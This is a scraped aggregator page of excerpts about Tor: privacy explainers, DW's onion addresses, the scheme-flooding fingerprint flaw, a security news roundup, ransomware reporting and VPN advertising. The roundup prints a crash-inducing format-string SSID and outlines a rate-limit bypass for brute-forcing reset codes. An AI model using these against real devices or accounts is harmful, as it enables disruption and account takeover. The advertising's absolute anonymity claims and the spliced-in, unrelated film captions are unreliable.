Category Archives: Tor Browser

Before stepping into the explanation of Pros and Cons of Tor, you need to know the importance of Tor and Why it is used? Do you wanna know the main purpose of using Tor browser on your system, then let me explain you the nook and corner of Tor. What is Tor? Tor is a browser that aims to conceal its users identities and their online activity from surveillance and traffic analysis by separatingidentification and routing.

Tor browser is an implementation of onion routing, which encrypts and thenrandomly bounces communications through a network of relays run by volunteers around the globe.

This is it. Now we can jump on to the topic.

Tor is a browser that lets you browse the internet anonymously. I guess, now you have got an idea about Tor browser and its usage.

DOUBLE THE SECURITY: Tor browser is one layer of protection to your information. If you need a double layer protection, then go ahead with VPN. The Powerful VPN can boost the anonymous talk and no one in the universecantrack your IP address, usernames, passwords and nothing.

But what is the advantage and disadvantage of using Tor browser on your system? Take a look at the article below for more opinion.

First, let me tell you that this browser is available for free. You can use them completely without any negligence. Secure your information by using Tor. It offers you the bunch of features in them. I have listed them below. Check it out.

View original post here:
Pros and Cons of using Tor Browser - Get Expert Review ...

People who value a high level of privacy protectionor who depend on this protection for political reasonscan access websites using Tor without leaving any traces on the net. With a Tor browser, users'internet traffic is automatically routed through several Tor servers, which ensure anonymity through encryption. Only then does it go to the actual destination:the web server users intendto visit.

This process is called routing. Tor actually stands for "The Onion Routing"because the Tor servers layer their encryption on top of the encryption of other servers reminiscent of onionlayers.

Tor is secure by design. For this reason, there have hardly been any major security incidents to the detriment of users. Its browser, which is based on the Firefox browser, is continuously developed and secured by the free, open source Tor project.

Content providers who want to offer their content directly in the Tor network operate an "onion service." This is a web server that is directly connected to the Tor network. These websites can be recognized by the extension .onionand can only be accessed via the Tor browser.

Deutsche Welle has also been operating its own onion service for some time, making it easier for users all over the world to access free media anonymously especially people who fear repression for using such free media. Tor can also be a useful tool for journalists, for example when they cannot conduct regular research because they are being persecuted by state actors and intelligence agencies. This is crucial because fear of surveillance alone canquickly lead to self-censorship.

Tor not only protects users' anonymity, but also offers them paths to free information in censored markets.

For example, authoritarian states often block content from international information providers such as DW, the BBC and The New York Times. With Tor, this state censorship can be circumvented. The previous web address of Deutsche Welle was:https://dwnewsvdyyiamwnp.onion.

But this is now changing.

As you can probably already tell from the long and difficult-to-readonion service addresses, cryptography is involved here. Tor does not have a central domain systemwhich forwardsreadable web addresses like dw.com to the IP addresses of computers.

Address allocation is decentralized and consists of a cryptographic key. This makes it particularly secure. Part of this key is the onion service address.

Attackers can get hold of such a key by brute force. So far, they have mostly used these attacks to hack passwords.

The longer the key or password, the more computing power is required and the more difficult such an attack becomes.

It is precisely this massive computing power that is now available to some authoritarian regimes in the form of Bitcoin mining farms. In recent months, computing capacity has grown very quickly in countries such as China and Iran.

As a result, the Tor project has decided to only support addresses with a length of 56 characters and has adopted the "Onion v3 standard" for this purpose. Addresses in the new standard are considered secure for the next few years, not only because of their greater length, but also because of other modern cryptographic functions.

DW's new onion service address as of now is:

https://dwnewsgngmhlplxy6o2twtfgjnrnjxbegbwqx6wnotdhkzt562tszfid.onion

Because these v3 addresses are very difficult to read and remember, it is also sufficient to enter the publicly known addresses in the Tor browser for exampl:e dw.com. The browser then offers to use the complicated Tor address once and automatically on future page requests.

But be careful: This procedure means that you briefly leavethe secure Tor network, so users who need the highest level of anonymity should only use the long cryptographic v3 Tor address.

Shortly after winning a major prize at the Cannes Film Festival with "A Man of Integrity," the Hamburg-based director returned to Iran in September 2017. Iranian authorities then confiscated Rasoulof's passport and banned him from directing new films. In July 2019, he was sentenced to a year in prison. He nevertheless managed to shoot "There Is No Evil" (photo), which won the Golden Bear in 2020.

Abdolreza Kahani migrated to France in 2015 after three of his films were banned in the Islamic Republic and he was prevented from submitting them to international festivals. "We are born into censorship. Censorship affects not just literature, music and film. Censorship begins inside the home," he told the Center for Human Rights in Iran (CHRI) in a recent interview.

Getting a screening permit for films that premiered at world festivals can take years: Kianoush Ayari's "The Paternal House," from 2012, was only released in Iran last year after the director agreed to make some edits. But a week later, in November 2019, the film was banned, prompting 200 film personalities to sign an open letter condemning state censorship and calling for freedom of expression.

He is one of the few directors to have won the Oscar for best foreign film twice: "A Separation" (2012) and in 2016, "The Salesman" (photo). Farhadi boycotted the second ceremony, which took place shortly after Trump's "Muslim travel ban." Even though Iranian officials were behind Farhadi's Oscar entries, the filmmaker was among the signatories of the 2019 open call condemning state censorship.

Iranian-Kurdish filmmaker Bahman Ghobadi directed the world's first Kurdish-language feature film, the 2000 "A Time for Drunken Horses" (photo). Following his semi-documentary about the underground indie music scene in Tehran, "No One Knows About Persian Cats" (2009), Ghobadi fled Iran, as intelligence agents repeatedly threatened him and urged him to leave. Those two films won awards at Cannes.

Having permanently left Iran as a young adult, Marjane Satrapi didn't have to deal with Iranian authorities as an author and filmmaker. Her best-known comic book, "Persepolis" (photo) adapted into a film that won the Cannes Jury Prize in 2007, offers a personal depiction of how a teenager can get into trouble with the police by disregarding modesty codes and buying music banned by the regime.

Released shortly before the 9/11 attacks, Mohsen Makhmalbaf's 2001 film, "Kandahar," became a must-see work about the fate of Afghan women. Many of the award-winning director's films are banned in Iran, and he left the country to live in France after Mahmoud Ahmadinejad's election. His most recent feature film, "The President" (photo) opened the Venice Film Festival in 2014.

The daughter of Mohsen Makhmalbaf is one of the most influential directors of the Iranian New Wave. Her first feature film, "The Apple," which she directed at the age of 17, premiered at the Cannes Film Festival in 1998. Two years later, she won the Cannes Jury Prize with "Blackboards. (photo). She then became the youngest person to sit on the jury of festivals such as Cannes, Venice and Berlin.

Winning a Cannes award with his 1995 feature debut, "The White Balloon," Panahi kept receiving international acclaim despite increasing restrictions in Iran. Since 2010, he has been banned from making films and leaving the country, but still managed to secretly direct more works, including the Golden Bear-winning "Taxi" (2015) and "3 Faces" (photo), which won Cannes' best screenplay prize in 2018.

A decade after winning the International Award at the Venice Biennale, the visual artist's feature debut, "Women Without Men" (photo) was also honored at the Venice film festival in 2009. A critic of political injustice, Neshat lives in self-imposed exile in New York. "While I am critical of the West, women artists in Iran still face censorship, torture and, at times, execution," she said.

Author: Elizabeth Grenier

Continued here:
Protection from hackers: How Tor is tightening security - DW (English)

Open-source Tor browser has been updated to version 10.0.18 with fixes for multiple issues, including a privacy-defeating bug that could be used to uniquely fingerprint users across different browsers based on the apps installed on a computer.

In addition to updating Tor to 0.4.5.9, the browser's Android version has been upgraded to Firefox to version 89.1.1, alongside incorporating patches rolled out by Mozilla for several security vulnerabilities addressed in Firefox 89.

Chief among the rectified issues is a new fingerprinting attack that came to light last month. Dubbed scheme flooding, the vulnerability enables a malicious website to leverage information about installed apps on the system to assign users a permanent unique identifier even when they switch browsers, use incognito mode, or a VPN.

Put differently, the weakness takes advantage of custom URL schemes in apps as an attack vector, allowing a bad actor to track a device's user between different browsers, including Chrome, Firefox, Microsoft Edge, Safari, and even Tor, effectively circumventing cross-browser anonymity protections on Windows, Linux, and macOS.

"A website exploiting the scheme flooding vulnerability could create a stable and unique identifier that can link those browsing identities together," FingerprintJS researcher Konstantin Darutkin said.

Currently, the attack checks a list of 24 installed applications that consists of Adobe, Battle.net, Discord, Epic Games, ExpressVPN, Facebook Messenger, Figma, Hotspot Shield, iTunes, Microsoft Word, NordVPN, Notion, Postman, Sketch, Skype, Slack, Spotify, Steam, TeamViewer, Telegram, Visual Studio Code, WhatsApp, Xcode, and Zoom.

The issue has serious implications for privacy as it could be exploited by adversaries to unmask Tor users by correlating their browsing activities as they switch to a non-anonymizing browser, such as Google Chrome. To counter the attack, Tor now sets "network.protocol-handler.external" to false so as to block the browser from probing installed apps.

Of the other three browsers, while Google Chrome features built-in safeguards against scheme flooding it prevents launching any application unless it's triggered by a user gesture, like a mouse click the browser's PDF Viewer was found to bypass this mitigation.

"Until this vulnerability is fixed, the only way to have private browsing sessions not associated with your primary device is to use another device altogether," Darutkin said. Tor browser users are recommended to move quickly to apply the update to ensure they are protected.

The development arrives little over a week after encrypted messaging service Wire addressed two critical vulnerabilities in its iOS and web app that could lead to a denial-of-service (CVE-2021-32666) and permit an attacker to take control of a user account (CVE-2021-32683).

Go here to read the rest:
Patch Tor Browser Bug to Prevent Tracking of Your Online Activities - The Hacker News

Theres been yet another technique discovered to fingerprint users, and this one can even work in the Tor browser. Scheme flooding works by making calls to application URLs, something like steam://browsemedia. If your machine supports the requested custom URL, a pop-up is displayed, asking permission to launch the external application. That pop-up can be detected by JavaScript in the browser. Detect enough apps, and you can build a reasonable fingerprint of the system the test is run on. Unlike some previous fingerprinting techniques, this one isnt browser dependent it will theoretically give the same results for any browser. This means even the Tor browser, or any browser being used over the Tor network, can give your potentially unique set of installed programs away.

Now for the good news. The Chrome devs are already working on this issue, and in fact, Chrome on my Linux desktop didnt respond to the probes in a useful way. Feel free to check out the demo, and see if the results are accurate. And as for Tor, you really should be running that on a dedicated system or in a VM if you really need to stay anonymous. And disable JavaScript if you dont want the Internet to run code on your computer.

Windows system security and Linux system security are quite different. OK, thats probably both something of an understatement, and pretty obvious. In a project like Samba, which re-implements the Server Message Block protocol, those differences are a constant challenge. Sometimes, like in the case of CVE-2021-20254, the results are unusual.

This story really begins at Linkping University, where [Peter Eriksson] discovered that someone was able to delete a file on a Samba share, when that should not have been possible. He apparently tracked down the problem, which is in the Samba code that maps Windows SIDs to Unix Group IDs. Samba caches these lookups, and a possible cached result is that a match cannot be found. The bug is triggered when that cached response is fetched again, reading past the end of the buffer. There isnt a known technique for triggering this bug intentionally, but thats likely a failure of imagination, so make sure you get this one patched.

There are odd machines still connected to the Plain Old Telephone System (POTS). This thought was apparently keeping [Valtteri Lehtinen] up at night, because he built a system to call 56,874 different phone numbers, and then documented what he found. His testing rig is a bit odd, using WarVOX as the dialer. That program only supports IAX2, a VoIP protocol introduced by the Asterisk project that has been mostly forgotten in favor of SIP. His interface to the outside world was a SIP-to-GSM gateway and a cheap prepaid SIM card. To make WarVOX talk to the SIP gateway, he stood up an Asterisk instance to do the translation. His target was the freephone numbers, similar to a 1-800 number in the States mostly businesses rather than individuals.

He spent 60 seconds per call, and recorded the results, running the experiment for 40 days. His results? About 2% of the numbers were interesting. He categorized those, and came up with 74 unique systems he had reached. For an example of what that means, seven of his calls reached dedicated fax lines. These were indistinguishable from each other, so only accounts for a single unique system. Eleven calls just played music, but several of those seemed to be playing the exact same music, making for seven unique systems.

There are a few really oddball recordings that [Valtteri] found. Two numbers contain a prompt about the zombie apocalypse, asking the caller if he wants to be rescued. These remind me very much of the various joke phone numbers, like the rejection hotline. He also found a couple numbers that sound very much like old mechanical phone switching hardware. Wouldnt it be interesting to know exactly what hardware is on the other end of those calls? We cant recommend taking up wardialing as a hobby, but there are certainly still some interesting endpoints out there. Want to look into the recordings for yourself? Check out his blog post, where many of the recordings are available to listen to.

Theres a very odd problem with the iPhone thats attracted a lot of attention this week. Connecting to a WiFi network with a name like %p%s%s%s%s%n made the phones WiFi subsystem crash, and prevented connection to any other networks. That string looks interesting, doesnt it? Almost like a format string. For those not following, most programming languages have string formatting functions that take a series of inputs, combined with a format string like this one, and plug the inputs into the string. Cs printf() is one of the more familiar to many of us. The catch here is that when the inputs dont match what the string calls for, you enter the realm of undefined behavior, AKA crashes and vulnerabilities.

[CodeColorist] took a deeper look at the problem, and confirmed that it is indeed a format string issue. When the device attempts to connect to a new WiFi network, a message is written to the system log: Attempting Apple80211AssociateAsync to and then the network name, using a format string method. The process of writing the string to the log invokes another such method, but this time the SSID is now part of the format string. The inputs no longer match, leading to a crash of the WiFi process. While its certainly an annoying bug, it doesnt appear to be one that can lead to RCE.

Password reset systems have always been something of a weak point of security schemes. Of particular note are the schemes that use a four- or six-digit reset code to protect the account. Have you ever wondered what stops an attacker from triggering a reset, and then simply trying all one million possible codes, assuming a six-digit number? The usual answer is a combination of expiring codes and rate limiting on guesses. This story is about Apple accounts, but the background is that [Laxman Muthiyah] first found a way to exploit the password reset function of Instagram.

Heres the setup. When you start the password reset process on Instagram, a six-digit code is emailed to the email address on file. If you have access to that email, you type in the code within ten minutes, proving that youre the account owner. After ten minutes, the code expires. If youre an attacker, you can start the password reset process, and then guess that six-digit code again, one million possible values. Try to brute force the code, and about 200 attempts go through before the rate-limiting kicks in. That gives you a 1-in-5,000 chance in breaking into the account.

What if there was a way to get around the rate-limiting? Hint: There was. You see, trying to send more than 200 guesses from a single IP was easily detected and rate-limited. But what if you had two different IPs? Send 200 guesses from each, at the same time, and they all get processed with no rate limiting. So to take over an Instagram account, all it takes is 5,000 IPs that you can send traffic from for a few seconds. Now how would you get 5,000 IPs to use? Three options come to mind. The cloud, a botnet, or IPv6 addresses. He used a cloud to demonstrate the attack, covering 20% of the possible key space in a single go. He netted a cool $30,000 from turning in the findings to Facebook.

Would other providers have the same weakness? [Muthiyah] took a look at Apples account recovery process, and found a way to pull off the same attack, but with some major limitations. Rather than 200 guesses from each IP, he could send six. That isnt enough for a viable attack but the target URL endpoint exists on six different IPs. That gives an attacker 36 guesses from each IP he controls. Thats on the edge of being exploitable, with only 28,000 IPs needed. Thats a *small* botnet. Apple agreed, asking him to keep the attack under his hat until they could push out fixes.

The story gets weird from here. First, what should have been a relatively simple fix took about ten months to roll out. [Laxman] asked for an update, and was told that his attack only worked against accounts not tied to a hardware device. Accounts tied to a device use a bit different password reset method, where a hashing function is used to prove that the user knows the reset code. That URL endpoint is now very well protected against his parallel brute-force attack, but he was only able to test it after the flaw was fixed.

For his trouble, Apple offered him $18,000. Sounds great, right? Hold up. A vulnerability that leads to an Apple account takeover should be worth $100,000; and if that leads to data extraction from a device, it goes up to $250,000. [Laxman] openly speculates that his attack probably worked on all accounts before it was patched, and suspects Apple of pulling a fast one. He walked away from the offered bounty, and posted the entire story for everyone to see. This isnt the first time weve covered disputes over bug bounties, and Im sure it wont be the last.

Eclypsium found a handful of problems with Dells firmware update process. BIOSConnect is a firmware update process that runs entirely from the system BIOS. From what I can tell, this means that a Dell machine could be vulnerable even if it isnt running Dells SupportAssist, or even Windows at all. The BIOS makes an HTTPS request to downloads.dell.com, but fails to properly validate the TLS certificate. It seems that any wildcard certificate for any domain will be accepted. You could fool it as easily as using a Lets Encrypt certificate for *.myuniquedomain.com, and telling an HTTPS server to use that cert for dell.com.

The saving grace here is that an attacker needs to be on the same network as the victim machine, in order to MItM the connection to the update server. Either way, if you have Dell hardware, go check for this issue and update if its there, or at least turn off BIOSConnect.

Theres been a rash of ransomware attacks against consumer NAS devices, and it looks like Western Digitals My Book Live might be the next device to be hit. Multiple users discovered their drives wiped on the 23rd, and a log note that a factory restore had been triggered. WD has released a statement, acknowledging the issue, and recommending that anyone with a My Book Live unplug it from the network right away, and leave it offline until they can get to the bottom of the issue. The latest official news is a reference to a 2018 CVE, a pre-auth network RCE. What immediately comes to mind is that a particularly obnoxious ransomware program could include this attack as part of an effort to destroy backups. The odd part is that none of the affected users have reported a ransomware note.

Microsoft announced Windows 11, and while there was the normal marketing hype and keynotes, there were a couple interesting security-related tidbits, mostly in the updated system requirements. First up is the Trusted Platform Module 2.0 requirement. Most modern motherboards ship with a firmware TPM, but often disabled by default. If you try running the upgrade check, and were told that your nearly-new system cant run Windows 11, thats probably why. But why would Microsoft require a TPM for everyone? Credit to Robert Graham for this one: TPM is a requirement for BitLocker, the high quality whole disk encryption software built into Windows. This would indicate that BitLocker is going to be on for everyone, rather than a feature you have to manually enable.

The other somewhat surprising change is that Microsoft is doing away with support for 32-bit processors, and going to 64-bit Windows only. There are sure to be some issues for people still running 16-bit code, which wont execute at all under 64-bit Windows. There are, however, quite a few security features that only run on 64-bit windows, like ASLR, signed drivers, the NX bit for Data Execution Protection, and PatchGuard. While the reduced engineering burden of dropping 32-bit Windows was likely the major driver in this decision, the Windows platform will be significantly more secure as a result.

Visit link:
This Week In Security: Schemeflood, Modern Wardialing, And More! - Hackaday

TO SIGN UP FOR OUR DAILY EMAIL NEWSLETTER, CLICK HERE

On May 27, die-hard fans worldwide watched the cast of Friends revisit Stage 24 at the Warner Bros. Studios, reminisce about their time spent at Central Perk, and re-enact their favorite scenes. But a lot of fans were unable to see their beloved characters reunite once again. Instead, they were greeted by a Not in Service Area message on HBO Max. Is there anything you can do? Actually, there is. You only need a VPN to be able to enjoy The One Where They Get Back Together.

Get NordVPN 68% off now and do not miss any content again

Why some online content is not available to you

Streaming platforms like Netflix, Sky, or HBO Max are often not available in certain areas, or they offer different content in different countries. There are a few reasons behind this:

Because of all of this, popular streaming platforms set geo-restrictions. Thats the reason why you missed the Friends reunion, why Spotify is not available in Venezuela, and why Netflix users in Europe cant watch Maleficent.

Watch the Friends reunion episode wherever you are

What are geo-restrictions? They work by granting access to the website only to users with certain IP addresses. For example, the HBO Max homepage will look very different to someone with an American IP address and someone with a Swedish IP address.

Luckily, there are ways you can hide your IP and get a new one. The fastest and easiest way is to subscribe to a reliable VPN service, like NordVPN. With it, you can change your IP in a second one click is all it takes.

Proxies or the Tor browser can also change your IP, but they are often unstable and prone to IP and DNS leaks, and therefore unreliable. NordVPN offers a stable connection, thousands of servers to choose from, the fastest VPN speeds on the market, and bulletproof encryption. Once youre connected to one of their servers in the US, youll get an American IP, and to every online service you will appear to be browsing from the USA.

With geo-restrictions gone, you can stream movies and TV shows like a local. It works the same way in every country you connect to. This could also result in better prices some popular products and subscriptions are cheaper in certain parts of the world. If you want to save a few bucks, make sure to investigate different markets.

Wont a VPN slow me down?

Its a widely known fact that browsing with a VPN is significantly slower than without one. And, if youre looking to stream video content, you dont want that buffering icon to show up every two minutes.

Luckily, you wont have this problem with NordVPN. They have recently introduced a new VPN protocol called NordLynx. It combines both speed and security like no other VPN protocol ever could. With it, youll never have to worry about buffering again. Once you enable NordLynx, youll be able to connect to a remote server in a literal second and then hardly even notice the difference when browsing, gaming, or streaming.

Another thing worth noting is that connecting to NordVPN could even make your connection faster. If your ISP decides to limit your internet speed specifically for streaming, a VPN will help. Once you connect to a remote server, your ISP no longer sees what you do online, so they cant throttle internet speed for specific traffic, like streaming or gaming.

Use streaming services anywhere in the world

Want to watch Netflix, HBO Max, and Hulu without restrictions? Its easy:

Keep in mind that streaming platforms sometimes block IPs of known VPN servers, so you might need to try a few different servers until you find one that works. If you have any trouble setting up your app or connecting to a streaming service, you can always contact NordVPNs support team. They are available online 24/7 and will happily solve any problems you might have.

The NordVPN best offer is here, do not let it go.

Get NordVPN 68% off now

Follow this link:
Why You Missed the "Friends: The Reunion" - Programming Insider

New ransomware Epsilon Red has been found by Sophos researchers who detail the tools, techniques, procedures, and behaviour of the attackers behind it.

Sophos' researchers have discovered the Epsilon Red ransomware is delivered as the final executable payload in a manually orchestrated attack. And according to their analysis, every other component of the attack relies on PowerShell scripts.

The PowerShell scripts include:

Sophos says the ransom note left behind on the infected computers resembles that left by REvil ransomware, although the Epsilon Red operators appear to have made a few grammatical language corrections.

The attackers encourage victims to engage with them via a website. Based on the cryptocurrency address provided by the attackers, it would seem at least one of Epsilon Reds victims paid a ransom of 4.29BTC (around US$210,000).

Epsilon Red is an intriguing new ransomware, says Sophos Rapid Response manager, Peter Mackenzie.

The actual ransomware file itself is very pared down, probably because it has offloaded other tasks, such as deleting backs ups, to the PowerShell scripts. It is really only used for file encryption, and it doesnt precision-target assets. If it decides to encrypt a folder, it will encrypt everything inside that folder.

Unfortunately, this can mean other executables and dynamic link libraries (DLLs) are also encrypted, which can disable key running programs or the entire system. As a result, the attacked machine will need to be completely rebuilt, he says.

The Sophos analysis of the attackers behaviour could suggest they lack confidence in the reliability of their tools or the potential success of their attack, so they include alternative options and backup plans in case things fail.

Early on in the attack sequence the operators download and install a copy of Remote Utilities and the Tor Browser, possibly to ensure an alternate foothold if the initial access point gets locked down, says Sophos.

In other cases we see the operators issue redundant commands that use a slightly different method to accomplish the same goal, such as deleting processes and backups. The best way to prevent ransomware such as Epsilon Red is to ensure servers are fully patched and that security solutions can detect and block any suspicious behaviour and attempted file encryption.

The rest is here:
New ransomware Epsilon Red discovered - how it works - SecurityBrief New Zealand

Global security vendor Sophos claims to have discovered a new strain of Windows ransomware which is the final executable payload in a manual attack where every other stage is delivered through a PowerShell script. One of the entry points was an on-premise Microsoft Exchange Server installation.

In a detailed blog post, Sophos principal researcher Andrew Brandt said the new strain, named Epsilon Red, was written in the Go programming language and had been observed in operation against an American hospitality business recently. The name Epsilon Red comes from the X-Men series, and is a relatively obscure adversary of some of the X-Men in the Marvel extended universe.

A ransom of about 4.29 bitcoin was paid by at least one attacked entity, Brandt wrote, adding that this was based on tracking the bitcoin wallet which was listed by the attackers for payment.

"It appears that an enterprise Microsoft Exchange server was the initial point of entry by the attackers into the enterprise network," he wrote.

The ransom note left by Epsilon Red. Courtesy Sophos

"From that machine, the attackers used WMI to install other software onto machines inside the network that they could reach from the Exchange server."

The PowerShell scripts were numbered from 1 to 12 and the final executable was named Red.exe.

"Strangely enough, the ransom note closely resembles the note used by REvil, a much more widely used ransomware," Brandt wrote.

"But where the REvil note is typically riddled with spelling and grammatical errors, the note delivered by Epsilon Red has gone through a few edits to make its text more readable to an audience of native English speakers."

Apart from Brandt, Anand Ajjan, Richard Cohen, Fraser Howard, Elida Leite, Mark Loman, Andrew Ludgate, Peter Mackenzie, Nirav Parekh, and Gabor Szappanos also contributed to the blog post.

Mackenzie, manager of the Sophos Rapid Response team, said: "Epsilon Red is an intriguing new ransomware. The actual ransomware file itself is very pared down, probably because it has offloaded other tasks, such as deleting back-ups, to the PowerShell scripts.

"It is really only used for file encryption and it doesn't precision-target assets: if it decides to encrypt a folder, it will encrypt everything inside that folder. Unfortunately, this can mean other executables and dynamic link libraries are also encrypted, which can disable key running programs or the entire system. As a result the attacked machine will need to be completely rebuilt.

"Sophos' analysis of the attackers' behaviour suggest they may lack confidence in the reliability of their tools or the potential success of their attack, so they implement alternative options and back-up plans in case things fail.

"For instance, early on in the attack sequence the operators download and install a copy of Remote Utilities and the Tor Browser, possibly to ensure an alternate foothold if the initial access point gets locked down.

"In other cases we see the operators issue redundant commands that use a slightly different method to accomplish the same goal, such as deleting processes and backups. The best way to prevent ransomware such as Epsilon Red from taking hold is to ensure servers are fully patched and that your security solution can detect and block any suspicious behaviour and attempted file encryption."

Visit the iTWire Shop, a leading destination for stylish accessories, gear & gadgets, lifestyle products and everyday portable office essentials, drones, zoom lenses for smartphones, software and online training.

PLUS Big Brands include: Apple, Lenovo, LG, Samsung, Sennheiser and many more.

Products available for any country.

We hope you enjoy and find value in the much anticipated iTWire Shop.

ENTER THE SHOP NOW!

We work with you to develop the message and conduct the interview or product review in a safe and collaborative way. Unlike other Tech YouTube channels, we create a story around your message and post that on the homepage of ITWire, linking to your message.

In addition, your interview post message can be displayed in up to 7 different post displays on our the iTWire.com site to drive traffic and readers to your video content and downloads. This can be a significant Lead Generation opportunity for your business.

We also provide 3 videos in one recording/sitting if you require so that you have a series of videos to promote to your customers. Your sales team can add your emails to sales collateral and to the footer of their sales and marketing emails.

See the latest in Tech News, Views, Interviews, Reviews, Product Promos and Events. Plus funny videos from our readers and customers.

SEE WHAT'S ON ITWIRE TV NOW!

Continued here:
Sophos claims to have found new barebones Windows ransomware - iTWire

A vulnerability affecting desktop versions of four popular web browsers could be exploited by advertisers, malicious actors, and other third parties to track and profile users online even if they switch browsers, use incognito mode or a VPN, researcher and developer Konstantin Darutkin claims.

Darutkin and his colleagues from FingerprintJS are calling the vulnerability and its exploitation scheme flooding, as attackers (i.e., websites) can use browsers built-in custom URL scheme handlers to check if site visitors have 32 different applications installed on their desktops.

You can see this feature in action by entering skype:// in your browser address bar. If you have Skype installed, your browser will open a confirmation dialog that asks if you want to launch it, he explained.

Websites, such as their own live demo site, can flood the user with URL scheme requests for detecting the presence of widely used apps such as Spotify, Zoom, Slack, Telegram, Discord, Steam, Xcode, Microsoft Word, NordVPN, Hotspot Shield, and others and cancel those requests as soon as an app is detected as present or absent.

The information gathered from these requests can be used to create a permanent unique identifier that can link browsing identities together.

The scheme flood vulnerability allows for targeted advertisement and user profiling without user consent. The list of installed applications on your device can reveal a lot about your occupation, habits, and age. For example, if a Python IDE or a PostgreSQL server is installed on your computer, you are very likely to be a backend developer, Darutkin explained.

Or, for example, if the user has game clients installed, advertisers can push ads related to online games.

Depending on the apps installed on a device, it may be possible for a website to identify individuals for more sinister purposes. For example, a site may be able to detect a government or military official on the internet based on their installed apps and associate browsing history that is intended to be anonymous, he also pointed out.

FingerprintJS researchers tested Chrome, Firefox, Safari and the Tor Browser and found them to be vulnerable to this type of attack despite implemented safety mechanisms.

A combination of CORS policies and browser window features can be used to bypass [the safety mechanisms], Darutkin said.

Of the four major browsers impacted, only Chrome developers appear to be aware of the scheme flooding vulnerability. The issue has been discussed on the Chromium bug-tracker and is planned to be fixed soon. Additionally, only the Chrome browser had any form of scheme flood protection which presented a challenge to bypass.

The Register also successfully tested the technique on Brave, Yandex Browser and Microsoft Edge.

Getting a unique array of bits associated with a visitors identity is not only possible, but can be used on malicious websites in practice, Darutkin noted, though he says that they did a quick search of the web and didnt find any website actively exploiting the vulnerability.

Still, the researchers write-up could push some to use the scheme to track users online.

The team has submitted bug reports to Apple, Google and Mozilla, and hopes these vulnerability can be fixed soon. Lets hope that other browser creators will follow suit.

See original here:
Vulnerability in popular browsers could be used to track, profile users online - Help Net Security - Help Net Security

The primary purpose ofVPN servicesis tosafeguard your digital privacy. They do that via a number of differentVPN protocols, but they also use supplemental technologies for added privacy. Thats precisely the case with Onion over VPN, which is a set of technologies created for the most cautious of VPN users. So, lets see what is Onion over VPN, what it can do, and how to safely use it.

Onion (also known as Tor) is a network of relays/servers designed to disguise your identity by encrypting your Web traffic. Therefore, its quite similar to VPN services.

However, make no mistake. Onion and VPNs present two very different sets of technologies. What makes them similar is their end goal and that would be your digital privacy. There are many differences between the two, and those differences span across the methodologies used to conceal your Internet traffic.

Routing your traffic through Onion relays is free of charge, so anyone can do that. The only requirement is to use theTor browser(also available for free). The role of that Web browser is to prevent your device from communicating with Web servers directly. Instead, the Tor browser routes your traffic through a series of relays across the world, concealing your IP address, your physical location, and any other information that might be used to identify you online.

As its name implies, by using Onion over VPN, you employ two sets of technologies to obfuscate your Web traffic. Therefore, you get an additional layer of privacy protection.

The best way to describe how Onion over VPN works would be to describe its typical flow of data. So, heres what happens if you use a VPN that supports this technology natively:

What happens, in the end, depends on the type of websites you visit. For example, Onion websites (typically linked with the Dark Web) will decrypt your data upon arriving at its destination. And when it comes to regular websites, your data will be decrypted at a Tor exit note and forwarded to the website.

Since youre using double encryption with Onion over VPN, you practically eliminate any chances of anyone discovering your online whereabouts.

Related: 5 Best VPNs for the Dark Web Browse Tor Sites While Staying 100% Safe!

You should use Onion over VPN if youre very serious about maintaining your online privacy. In practice, this technology is often used by journalists, political activists, and similar.

As you can see, were talking about a very complex combination of technologies here. However, that doesnt mean that average home users shouldnt rely on it. Still, you need to be aware of the drawbacks and limitations that will surface as soon as you connect to an Onion over VPN server.

The biggest drawback will be the impact of this Web flow setup on your Internet connection speed. Since your data will be encrypted twice, you will experience significant slowdowns.

With that said, Onion over VPN is useful for low-bandwidth activities, such as Web browsing, sending and receiving emails, and uploading/downloading a limited amount of data. You wont get to use it to stream online media or download gigabytes of data in one go.

In theory, yes. However, keep in mind that when it comes to Onion over VPN, we are talking about different types of setups. Heres what that means exactly.

No matter which VPN you pick (check out the best VPNs), that VPN will encrypt your Web data as soon as you connect to one of its servers. Then, you can launch the Tor browser to encrypt your data once again. Therefore, this is a manual way to achieve an Onion over VPN type of Web data flow.

Then, some VPNs support this technology natively. They offer servers that are already optimized to encrypt your Web data twice (first using their own server and then using the Tor network). In other words, those VPNs do it all for you without involving the Tor browser.

Not many VPNs offer the Onion over VPN functionality natively, as you can always use a Tor browser independently. However, when it comes to those that do, you can choose from NordVPN and ProtonVPN.

If you want to reach the highest level of online privacy, it doesnt really matter if you choose Onion over VPN or a double VPN connection. Heres why.

When it comes to Onion over VPN, you employ a single VPN server and a network of Tor relays (there are usually up to three nodes in use, but youll always have a single exit node). So, you get double encryption, and were talking about different types of incredibly secure levels of encryptions here.

When it comes to double VPN connections, you employ two VPN servers. In other words, your Web traffic will be encrypted twice, adding a whole new layer of privacy. Even using a single VPN server should keep you hidden from anyone, so employing two servers should make you truly invisible on the Web.

With that said, those two technologies are equally capable. No matter which one you pick, you can rest assured that your privacy stays intact.

So, do you plan to use Onion over VPN, and in what way? Let us know via the comments section below. And lastly, thanks for reading!

Here is the original post:
What Is Onion Over VPN? - TechNadu

A VPN is the quickest and most reliable way of changing your IP address without any security concerns. Still, some of you may want to know how to change your IP address without using a VPN whether its because you only need a temporary solution or a VPN subscription just isnt in the budget.

Now, there are a few different ways you can go about changing your IP without a VPN. Here they are, in no particular order.

Much like a VPN, a proxy masks your true IP address and assigns you a new one based on the particular server you connect to. They differ from VPNs in that proxies dont encrypt your data, leaving you exposed to data collection, hackers, and other online dangers.

On top of that, proxies typically have no control over DNS traffic. This means your DNS requests still broadcast your real IP address to the DNS provider. A good VPN provider typically uses their own DNS servers and integrates leak protection to prevent that from happening.

Anyway, back to proxies. The one advantage of a proxy is that you dont need to set anything up on your device. This makes them useful if you only want to access a few websites in particular. Heres an example using the Hide.me proxy service.

Follow the instructions on the website. Enter the website you want to access anonymously, choose a location from the drop-down list, and voil.

Now, free proxies typically have a limited number of locations. Paid ones net you more options, but if youre looking for a wide server network, we really recommend checking out the top 10 VPNs with the most servers instead.

Using the Tor browser allows you to access a worldwide network of volunteer-run nodes (or relays). Think of it as using a series of interlinked proxies to connect to the Internet. Now, any online service you access can only see the IP address of the last node in the chain, keeping yours hidden.

Unfortunately, you have no control over which relays Tor decides to use at any given time. Moreover, the chain of nodes changes every time you visit a website. That being said, this process offers a great degree of online anonymity. If thats why you want to change your IP address without a VPN, then its a decent (and free!) solution.

